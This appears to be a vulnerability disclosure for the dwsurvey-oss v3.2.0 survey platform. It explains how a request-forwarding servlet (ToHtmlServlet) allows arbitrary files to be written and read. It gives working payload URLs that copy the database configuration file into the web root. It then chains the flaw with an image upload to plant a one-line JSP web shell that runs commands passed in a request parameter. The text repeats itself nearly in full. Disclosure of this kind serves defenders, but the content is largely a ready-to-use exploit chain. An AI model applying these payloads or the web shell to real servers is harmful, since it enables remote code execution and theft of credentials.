In the latest version of dwsurvey-oss-v3.2.0, there is a requestdispatcher.forward Request forwarding. Since the same request object and response object are shared before and after forwarding, the forwarded response will be output to the byte array buffer in memory, and finally the file is written in the printstream function. Because Requestdispatcher.forward is a jump between internal resources, you can request internal sensitive files on the server, such as: / WEB-INF / web.xml, causing arbitrary file vulnerabilities by writing and re accessing; In addition, it can also cause rce in combination with background file upload.
Request forwarding exists in the server method in the com/key/common/utils/ToHtmlServlet.java file
Due to the existence of ByteArrayOutputStream, the forwarded response is saved in the byte array buffer in memory
The flushDo function was passed in
Here, it is converted into a string and assigned to the document variable
Pass in printStream function
Splice savepath and filename as the target file, and finally write the response content to the file. The savepath and filename variables can also be controlled from the above
payload:
http://localhost:8888/diaowen/toHtml?filePath=/&fileName=1.txt&url=/WEB-INF/classes/conf/application.properties
The 1.txt file will be written in the web root directory and then accessed http://localhost:8888/diaowen/1.txt
Successfully read database configuration file:
You can also find a file upload place in the background to create rce, create a new questionnaire - > Advanced Editor in the background, and upload a picture horse and burpsuite to capture the package
Visit http://localhost:8888/diaowen/toHtml?filePath=/&fileName=1.jsp&url=/ueditor/jsp/upload/image/20210815/1629018633885086990.png ,the JSP file will be generated in the web root directory
Due to the Jsoup. parse method resolution to escape of JSP tags, when tested, when using the'<script> </script>' tag to package payload, can successfully bypass escaped
So the uploaded image file content is:
<script><%Runtime.getRuntime().exec(request.getParameter("i"));%></script>
Visit http://localhost:8888/diaowen/1.jsp?i=calc, successfully rce:
In the latest version of dwsurvey-oss-v3.2.0, there is a requestdispatcher.forward Request forwarding. Since the same request object and response object are shared before and after forwarding, the forwarded response will be output to the byte array buffer in memory, and finally the file is written in the printstream function. Because Requestdispatcher.forward is a jump between internal resources, you can request internal sensitive files on the server, such as: / WEB-INF / web.xml, causing arbitrary file vulnerabilities by writing and re accessing; In addition, it can also cause rce in combination with background file upload.
Request forwarding exists in the server method in the com/key/common/utils/ToHtmlServlet.java file Due to the existence of ByteArrayOutputStream, the forwarded response is saved in the byte array buffer in memory The flushDo function was passed in Here, it is converted into a string and assigned to the document variable Pass in printStream function Splice savepath and filename as the target file, and finally write the response content to the file. The savepath and filename variables can also be controlled from the above
payload:
http://localhost:8888/diaowen/toHtml?filePath=/&fileName=1.txt&url=/WEB-INF/classes/conf/application.properties
The 1.txt file will be written in the web root directory and then accessedhttp://localhost:8888/diaowen/1.txt
Successfully read database configuration file:You can also find a file upload place in the background to create rce, create a new questionnaire - > Advanced Editor in the background, and upload a picture horse and burpsuite to capture the package
Visit
http://localhost:8888/diaowen/toHtml?filePath=/&fileName=1.jsp&url=/ueditor/jsp/upload/image/20210815/1629018633885086990.png
,the JSP file will be generated in the web root directory Due to the Jsoup. parse method resolution to escape of JSP tags, when tested, when using the'<script> </script>'
tag to package payload, can successfully bypass escaped So the uploaded image file content is:<script><%Runtime.getRuntime().exec(request.getParameter("i"));%></script>
Visithttp://localhost:8888/diaowen/1.jsp?i=calc
, successfully rce: